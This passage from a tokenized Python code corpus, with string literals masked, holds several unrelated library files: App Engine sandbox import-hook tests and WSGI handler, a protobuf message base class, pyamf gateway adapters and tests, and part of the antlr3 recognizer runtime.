find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_enabled_c_library ( self ) : <EOL> imp . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , None ) ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , None ) ) <EOL> def test_load_module ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . load_module , '<STR_LIT>' ) <EOL> class PyCryptoRandomImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module ( self ) : <EOL> self . assertIsInstance ( <EOL> sandbox . PyCryptoRandomImportHook . find_module ( <EOL> '<STR_LIT>' ) , <EOL> sandbox . PyCryptoRandomImportHook ) <EOL> self . assertIsNone ( <EOL> sandbox . PyCryptoRandomImportHook . find_module ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from google . appengine . tools . devappserver2 import url_handler <EOL> class WSGIHandler ( url_handler . URLHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wsgi_app , url_pattern ) : <EOL> """<STR_LIT>""" <EOL> super ( WSGIHandler , self ) . __init__ ( re . compile ( url_pattern ) ) <EOL> self . _wsgi_app = wsgi_app <EOL> def handle ( self , unused_match , environ , start_response ) : <EOL> """<STR_LIT>""" <EOL> return self . _wsgi_app ( environ , start_response ) </s>
<s> """<STR_LIT>""" <EOL> class Error ( Exception ) : pass <EOL> class DecodeError ( Error ) : pass <EOL> class EncodeError ( Error ) : pass <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> DESCRIPTOR = None <EOL> def __deepcopy__ ( self , memo = None ) : <EOL> clone = type ( self ) ( ) <EOL> clone . MergeFrom ( self ) <EOL> return clone <EOL> def __eq__ ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __ne__ ( self , other_msg ) : <EOL> return not self == other_msg <EOL> def __hash__ ( self ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def MergeFrom ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def CopyFrom ( self , other_msg ) : <EOL> """<STR_LIT>""" <EOL> if self is other_msg : <EOL> return <EOL> self . Clear ( ) <EOL> self . MergeFrom ( other_msg ) <EOL> def Clear ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def SetInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def IsInitialized ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def MergeFromString ( self , serialized ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ParseFromString ( self , serialized ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> self . 
MergeFromString ( serialized ) <EOL> def SerializeToString ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def SerializePartialToString ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ListFields ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def HasField ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def ClearField ( self , field_name ) : <EOL> raise NotImplementedError <EOL> def HasExtension ( self , extension_handle ) : <EOL> raise NotImplementedError <EOL> def ClearExtension ( self , extension_handle ) : <EOL> raise NotImplementedError <EOL> def ByteSize ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _SetListener ( self , message_listener ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( serialized = self . SerializePartialToString ( ) ) <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __init__ ( ) <EOL> self . ParseFromString ( state [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import decimal <EOL> import pyamf <EOL> def convert_Decimal ( x , encoder ) : <EOL> """<STR_LIT>""" <EOL> if encoder . strict is False : <EOL> return float ( x ) <EOL> raise pyamf . EncodeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if hasattr ( decimal , '<STR_LIT>' ) : <EOL> pyamf . add_type ( decimal . Decimal , convert_Decimal ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os . path <EOL> try : <EOL> sys . path . remove ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> except ValueError : <EOL> pass <EOL> google = __import__ ( '<STR_LIT>' ) <EOL> webapp = google . appengine . ext . webapp <EOL> from pyamf import remoting , DecodeError <EOL> from pyamf . remoting import gateway <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class WebAppGateway ( webapp . RequestHandler , gateway . BaseGateway ) : <EOL> """<STR_LIT>""" <EOL> __name__ = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> gateway . BaseGateway . __init__ ( self , * args , ** kwargs ) <EOL> def getResponse ( self , request ) : <EOL> """<STR_LIT>""" <EOL> response = remoting . Envelope ( request . amfVersion ) <EOL> for name , message in request : <EOL> self . request . amf_request = message <EOL> processor = self . getProcessor ( message ) <EOL> response [ name ] = processor ( message , http_request = self . request ) <EOL> return response <EOL> def get ( self ) : <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . out . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . request . method ) <EOL> def post ( self ) : <EOL> body = self . request . body_file . read ( ) <EOL> stream = None <EOL> timezone_offset = self . _get_timezone_offset ( ) <EOL> try : <EOL> request = remoting . decode ( body , strict = self . strict , <EOL> logger = self . logger , timezone_offset = timezone_offset ) <EOL> except ( DecodeError , IOError ) : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . 
headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % request ) <EOL> try : <EOL> response = self . getResponse ( request ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % response ) <EOL> try : <EOL> stream = remoting . encode ( response , strict = self . strict , <EOL> logger = self . logger , timezone_offset = timezone_offset ) <EOL> except : <EOL> if self . logger : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> response = ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . debug : <EOL> response += "<STR_LIT>" % gateway . format_exception ( ) <EOL> self . error ( <NUM_LIT> ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . 
SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> return <EOL> response = stream . getvalue ( ) <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = remoting . CONTENT_TYPE <EOL> self . response . headers [ '<STR_LIT>' ] = str ( len ( response ) ) <EOL> self . response . headers [ '<STR_LIT>' ] = gateway . SERVER_NAME <EOL> self . response . out . write ( response ) <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from pyamf . adapters import util <EOL> import __builtin__ <EOL> if not hasattr ( __builtin__ , '<STR_LIT>' ) : <EOL> from sets import Set as set <EOL> class Iterable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iterable ) : <EOL> self . iterable = iterable <EOL> def __iter__ ( self ) : <EOL> return iter ( self . iterable ) <EOL> def keys ( self ) : <EOL> return self . iterable . keys ( ) <EOL> def values ( self ) : <EOL> return self . iterable . values ( ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . iterable . __getitem__ ( name ) <EOL> class HelperTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . encoder = object ( ) <EOL> def test_to_list ( self ) : <EOL> self . assertEqual ( util . to_list ( Iterable ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , self . encoder ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertEqual ( util . to_list ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , self . encoder ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( util . to_list ( '<STR_LIT:a>' , self . encoder ) , [ '<STR_LIT:a>' ] ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_list , obj , self . encoder ) <EOL> def test_to_set ( self ) : <EOL> self . assertEqual ( util . to_set ( Iterable ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , self . encoder ) , set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> self . assertEqual ( util . to_set ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , self . encoder ) , set ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) ) <EOL> self . assertEqual ( util . to_set ( '<STR_LIT:a>' , self . encoder ) , set ( '<STR_LIT:a>' ) ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_set , obj , self . encoder ) <EOL> def test_to_dict ( self ) : <EOL> self . assertEqual ( util . to_dict ( Iterable ( { '<STR_LIT:a>' : '<STR_LIT:b>' } ) , self . 
encoder ) , { '<STR_LIT:a>' : '<STR_LIT:b>' } ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_dict , obj , self . encoder ) <EOL> def test_to_tuple ( self ) : <EOL> self . assertEqual ( util . to_tuple ( Iterable ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) , self . encoder ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> obj = object ( ) <EOL> self . assertRaises ( TypeError , util . to_tuple , obj , self . encoder ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import inspect <EOL> from antlr3 import runtime_version , runtime_version_str <EOL> from antlr3 . constants import DEFAULT_CHANNEL , HIDDEN_CHANNEL , EOF , EOR_TOKEN_TYPE , INVALID_TOKEN_TYPE <EOL> from antlr3 . exceptions import RecognitionException , MismatchedTokenException , MismatchedRangeException , MismatchedTreeNodeException , NoViableAltException , EarlyExitException , MismatchedSetException , MismatchedNotSetException , FailedPredicateException , BacktrackingFailed , UnwantedTokenException , MissingTokenException <EOL> from antlr3 . tokens import CommonToken , EOF_TOKEN , SKIP_TOKEN <EOL> from antlr3 . compat import set , frozenset , reversed <EOL> class RecognizerSharedState ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . following = [ ] <EOL> self . errorRecovery = False <EOL> self . lastErrorIndex = - <NUM_LIT:1> <EOL> self . backtracking = <NUM_LIT:0> <EOL> self . ruleMemo = None <EOL> self . syntaxErrors = <NUM_LIT:0> <EOL> self . token = None <EOL> self . tokenStartCharIndex = - <NUM_LIT:1> <EOL> self . tokenStartLine = None <EOL> self . tokenStartCharPositionInLine = None <EOL> self . channel = None <EOL> self . type = None <EOL> self . text = None <EOL> class BaseRecognizer ( object ) : <EOL> """<STR_LIT>""" <EOL> MEMO_RULE_FAILED = - <NUM_LIT:2> <EOL> MEMO_RULE_UNKNOWN = - <NUM_LIT:1> <EOL> DEFAULT_TOKEN_CHANNEL = DEFAULT_CHANNEL <EOL> HIDDEN = HIDDEN_CHANNEL <EOL> tokenNames = None <EOL> antlr_version = ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> antlr_version_str = "<STR_LIT>" <EOL> def __init__ ( self , state = None ) : <EOL> self . input = None <EOL> if state is None : <EOL> state = RecognizerSharedState ( ) <EOL> self . _state = state <EOL> if self . antlr_version > runtime_version : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . antlr_version_str , <EOL> runtime_version_str , <EOL> self . 
antlr_version_str ) ) <EOL> elif ( self . antlr_version < ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) and <EOL> self . antlr_version != runtime_version ) : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . antlr_version_str , <EOL> runtime_version_str , <EOL> self . antlr_version_str ) ) <EOL> def setInput ( self , input ) : <EOL> self . input = input <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state is None : <EOL> return <EOL> self . _state . following = [ ] <EOL> self . _state . errorRecovery = False <EOL> self . _state . lastErrorIndex = - <NUM_LIT:1> <EOL> self . _state . syntaxErrors = <NUM_LIT:0> <EOL> self . _state . backtracking = <NUM_LIT:0> <EOL> if self . _state . ruleMemo is not None : <EOL> self . _state . ruleMemo = { } <EOL> def match ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> matchedSymbol = self . getCurrentInputSymbol ( input ) <EOL> if self . input . LA ( <NUM_LIT:1> ) == ttype : <EOL> self . input . consume ( ) <EOL> self . _state . errorRecovery = False <EOL> return matchedSymbol <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> matchedSymbol = self . recoverFromMismatchedToken ( input , ttype , follow ) <EOL> return matchedSymbol <EOL> def matchAny ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . _state . errorRecovery = False <EOL> self . input . consume ( ) <EOL> def mismatchIsUnwantedToken ( self , input , ttype ) : <EOL> return input . LA ( <NUM_LIT:2> ) == ttype <EOL> def mismatchIsMissingToken ( self , input , follow ) : <EOL> if follow is None : <EOL> return False <EOL> if EOR_TOKEN_TYPE in follow : <EOL> if len ( self . _state . following ) > <NUM_LIT:0> : <EOL> follow = follow - set ( [ EOR_TOKEN_TYPE ] ) <EOL> viableTokensFollowingThisRule = self . computeContextSensitiveRuleFOLLOW ( ) <EOL> follow = follow | viableTokensFollowingThisRule <EOL> if input . 
LA ( <NUM_LIT:1> ) in follow or EOR_TOKEN_TYPE in follow : <EOL> return True <EOL> return False <EOL> def mismatch ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> if self . mismatchIsUnwantedToken ( input , ttype ) : <EOL> raise UnwantedTokenException ( ttype , input ) <EOL> elif self . mismatchIsMissingToken ( input , follow ) : <EOL> raise MissingTokenException ( ttype , input , None ) <EOL> raise MismatchedTokenException ( ttype , input ) <EOL> def reportError ( self , e ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . errorRecovery : <EOL> return <EOL> self . _state . syntaxErrors += <NUM_LIT:1> <EOL> self . _state . errorRecovery = True <EOL> self . displayRecognitionError ( self . tokenNames , e ) <EOL> def displayRecognitionError ( self , tokenNames , e ) : <EOL> hdr = self . getErrorHeader ( e ) <EOL> msg = self . getErrorMessage ( e , tokenNames ) <EOL> self . emitErrorMessage ( hdr + "<STR_LIT:U+0020>" + msg ) <EOL> def getErrorMessage ( self , e , tokenNames ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( e , UnwantedTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( <EOL> self . getTokenErrorDisplay ( e . getUnexpectedToken ( ) ) , <EOL> tokenName <EOL> ) <EOL> elif isinstance ( e , MissingTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( <EOL> tokenName , self . getTokenErrorDisplay ( e . token ) <EOL> ) <EOL> elif isinstance ( e , MismatchedTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . 
token ) + "<STR_LIT>" + tokenName <EOL> elif isinstance ( e , MismatchedTreeNodeException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( e . node , tokenName ) <EOL> elif isinstance ( e , NoViableAltException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) <EOL> elif isinstance ( e , EarlyExitException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) <EOL> elif isinstance ( e , MismatchedSetException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedNotSetException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , FailedPredicateException ) : <EOL> msg = "<STR_LIT>" + e . ruleName + "<STR_LIT>" + e . predicateText + "<STR_LIT>" <EOL> else : <EOL> msg = str ( e ) <EOL> return msg <EOL> def getNumberOfSyntaxErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _state . syntaxErrors <EOL> def getErrorHeader ( self , e ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( e . line , e . charPositionInLine ) <EOL> def getTokenErrorDisplay ( self , t ) : <EOL> """<STR_LIT>""" <EOL> s = t . text <EOL> if s is None : <EOL> if t . type == EOF : <EOL> s = "<STR_LIT>" <EOL> else : <EOL> s = "<STR_LIT:<>" + t . type + "<STR_LIT:>>" <EOL> return repr ( s ) <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> sys . stderr . write ( msg + '<STR_LIT:\n>' ) <EOL> def recover ( self , input , re ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . lastErrorIndex == input . index ( ) : <EOL> input . consume ( ) <EOL> self . _state . lastErrorIndex = input . index ( ) <EOL> followSet = self . computeErrorRecoverySet ( ) <EOL> self . beginResync ( ) <EOL> self . 
consumeUntil ( input , followSet ) <EOL> self . endResync ( ) <EOL> def beginResync ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def endResync ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def computeErrorRecoverySet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . combineFollows ( False ) <EOL> def computeContextSensitiveRuleFOLLOW ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . combineFollows ( True ) <EOL> def combineFollows ( self , exact ) : <EOL> followSet = set ( ) <EOL> for idx , localFollowSet in reversed ( list ( enumerate ( self . _state . following ) ) ) : <EOL> followSet |= localFollowSet <EOL> if exact : <EOL> if EOR_TOKEN_TYPE in localFollowSet : <EOL> if idx > <NUM_LIT:0> : <EOL> followSet . remove ( EOR_TOKEN_TYPE ) <EOL> else : <EOL> break <EOL> return followSet <EOL> def recoverFromMismatchedToken ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> e = None <EOL> if self . mismatchIsUnwantedToken ( input , ttype ) : <EOL> e = UnwantedTokenException ( ttype , input ) <EOL> self . beginResync ( ) <EOL> input . consume ( ) <EOL> self . endResync ( ) <EOL> self . reportError ( e ) <EOL> matchedSymbol = self . getCurrentInputSymbol ( input ) <EOL> input . consume ( ) <EOL> return matchedSymbol <EOL> if self . mismatchIsMissingToken ( input , follow ) : <EOL> inserted = self . getMissingSymbol ( input , e , ttype , follow ) <EOL> e = MissingTokenException ( ttype , input , inserted ) <EOL> self . reportError ( e ) <EOL> return inserted <EOL> e = MismatchedTokenException ( ttype , input ) <EOL> raise e <EOL> def recoverFromMismatchedSet ( self , input , e , follow ) : <EOL> """<STR_LIT>""" <EOL> if self . mismatchIsMissingToken ( input , follow ) : <EOL> self . reportError ( e ) <EOL> return self . 
getMissingSymbol ( input , e , INVALID_TOKEN_TYPE , follow ) <EOL> raise e <EOL> def getCurrentInputSymbol ( self , input ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getMissingSymbol ( self , input , e , expectedTokenType , follow ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def consumeUntil ( self , input , tokenTypes ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( tokenTypes , ( set , frozenset ) ) : <EOL> tokenTypes = frozenset ( [ tokenTypes ] ) <EOL> ttype = input . LA ( <NUM_LIT:1> ) <EOL> while ttype != EOF and ttype not in tokenTypes : <EOL> input . consume ( ) <EOL> ttype = input . LA ( <NUM_LIT:1> ) <EOL> def getRuleInvocationStack ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _getRuleInvocationStack ( self . __module__ ) <EOL> def _getRuleInvocationStack ( cls , module ) : <EOL> """<STR_LIT>""" <EOL> rules = [ ] <EOL> for frame in reversed ( inspect . stack ( ) ) : <EOL> code = frame [ <NUM_LIT:0> ] . f_code <EOL> codeMod = inspect . getmodule ( code ) <EOL> if codeMod is None : <EOL> continue <EOL> if codeMod . __name__ != module : <EOL> continue <EOL> if code . co_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> rules . append ( code . co_name ) <EOL> return rules <EOL> _getRuleInvocationStack = classmethod ( _getRuleInvocationStack ) <EOL> def getBacktrackingLevel ( self ) : <EOL> return self . _state . backtracking <EOL> def getGrammarFileName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . grammarFileName <EOL> def getSourceName ( self ) : <EOL> raise NotImplementedError <EOL> def toStrings ( self , tokens ) : <EOL> """<STR_LIT>""" <EOL> if tokens is None : <EOL> return None <EOL> return [ token . text for token in tokens ] <EOL> def getRuleMemoization ( self , ruleIndex , ruleStartIndex ) : <EOL> """<STR_LIT>""" <EOL> if ruleIndex not in self . _state . ruleMemo : <EOL> self . _state . ruleMemo [ ruleIndex ] = { } <EOL> return self . _state . ruleMemo [ ruleIndex ] . get ( <EOL> ruleStartIndex , self . 
MEMO_RULE_UNKNOWN <EOL> ) <EOL> def alreadyParsedRule ( self , input , ruleIndex ) : <EOL> """<STR_LIT>""" <EOL> stopIndex = self . getRuleMemoization ( ruleIndex , input . index ( ) ) <EOL> if stopIndex == self . MEMO_RULE_UNKNOWN : <EOL> return False <EOL> if stopIndex == self . MEMO_RULE_FAILED : <EOL> raise BacktrackingFailed <EOL> else : <EOL> input . seek ( stopIndex + <NUM_LIT:1> ) <EOL> return True <EOL> def memoize ( self , input , ruleIndex , ruleStartIndex , success ) : <EOL> """<STR_LIT>""" <EOL> if success : <EOL> stopTokenIndex = input . index ( ) - <NUM_LIT:1> <EOL> else : <EOL> stopTokenIndex = self . MEMO_RULE_FAILED <EOL> if ruleIndex in self . _state . ruleMemo : <EOL> self . _state . ruleMemo [ ruleIndex ] [ ruleStartIndex ] = stopTokenIndex <EOL> def traceIn ( self , ruleName , ruleIndex , inputSymbol ) : <EOL> sys . stdout . write ( "<STR_LIT>" % ( ruleName , inputSymbol ) ) <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT>" % self . _state . backtracking ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> def traceOut ( self , ruleName , ruleIndex , inputSymbol ) : <EOL> sys . stdout . write ( "<STR_LIT>" % ( ruleName , inputSymbol ) ) <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT>" % self . _state . backtracking ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> class TokenSource ( object ) : <EOL> """<STR_LIT>""" <EOL> def nextToken ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> token = self . nextToken ( ) <EOL> if token is None or token . type == EOF : <EOL> raise StopIteration <EOL> return token <EOL> class Lexer ( BaseRecognizer , TokenSource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , state = None ) : <EOL> BaseRecognizer . __init__ ( self , state ) <EOL> TokenSource . 
__init__ ( self ) <EOL> self . input = input <EOL> def reset ( self ) : <EOL> BaseRecognizer . reset ( self ) <EOL> if self . input is not None : <EOL> self . input . seek ( <NUM_LIT:0> ) <EOL> if self . _state is None : <EOL> return <EOL> self . _state . token = None <EOL> self . _state . type = INVALID_TOKEN_TYPE <EOL> self . _state . channel = DEFAULT_CHANNEL <EOL> self . _state . tokenStartCharIndex = - <NUM_LIT:1> <EOL> self . _state . tokenStartLine = - <NUM_LIT:1> <EOL> self . _state . tokenStartCharPositionInLine = - <NUM_LIT:1> <EOL> self . _state . text = None <EOL> def nextToken ( self ) : <EOL> """<STR_LIT>""" <EOL> while <NUM_LIT:1> : <EOL> self . _state . token = None <EOL> self . _state . channel = DEFAULT_CHANNEL <EOL> self . _state . tokenStartCharIndex = self . input . index ( ) <EOL> self . _state . tokenStartCharPositionInLine = self . input . charPositionInLine <EOL> self . _state . tokenStartLine = self . input . line <EOL> self . _state . text = None <EOL> if self . input . LA ( <NUM_LIT:1> ) == EOF : <EOL> return EOF_TOKEN <EOL> try : <EOL> self . mTokens ( ) <EOL> if self . _state . token is None : <EOL> self . emit ( ) <EOL> elif self . _state . token == SKIP_TOKEN : <EOL> continue <EOL> return self . _state . token <EOL> except NoViableAltException , re : <EOL> self . reportError ( re ) <EOL> self . recover ( re ) <EOL> except RecognitionException , re : <EOL> self . reportError ( re ) <EOL> def skip ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _state . token = SKIP_TOKEN <EOL> def mTokens ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def setCharStream ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . input = None <EOL> self . reset ( ) <EOL> self . input = input <EOL> def getSourceName ( self ) : <EOL> return self . input . getSourceName ( ) <EOL> def emit ( self , token = None ) : <EOL> """<STR_LIT>""" <EOL> if token is None : <EOL> token = CommonToken ( <EOL> input = self . input , <EOL> type = self . 
_state . type , <EOL> channel = self . _state . channel , <EOL> start = self . _state . tokenStartCharIndex , <EOL> stop = self . getCharIndex ( ) - <NUM_LIT:1> <EOL> ) <EOL> token . line = self . _state . tokenStartLine <EOL> token . text = self . _state . text <EOL> token . charPositionInLine = self . _state . tokenStartCharPositionInLine <EOL> self . _state . token = token <EOL> return token <EOL> def match ( self , s ) : <EOL> if isinstance ( s , basestring ) : <EOL> for c in s : <EOL> if self . input . LA ( <NUM_LIT:1> ) != ord ( c ) : <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mte = MismatchedTokenException ( c , self . input ) <EOL> self . recover ( mte ) <EOL> raise mte <EOL> self . input . consume ( ) <EOL> else : <EOL> if self . input . LA ( <NUM_LIT:1> ) != s : <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mte = MismatchedTokenException ( unichr ( s ) , self . input ) <EOL> self . recover ( mte ) <EOL> raise mte <EOL> self . input . consume ( ) <EOL> def matchAny ( self ) : <EOL> self . input . consume ( ) <EOL> def matchRange ( self , a , b ) : <EOL> if self . input . LA ( <NUM_LIT:1> ) < a or self . input . LA ( <NUM_LIT:1> ) > b : <EOL> if self . _state . backtracking > 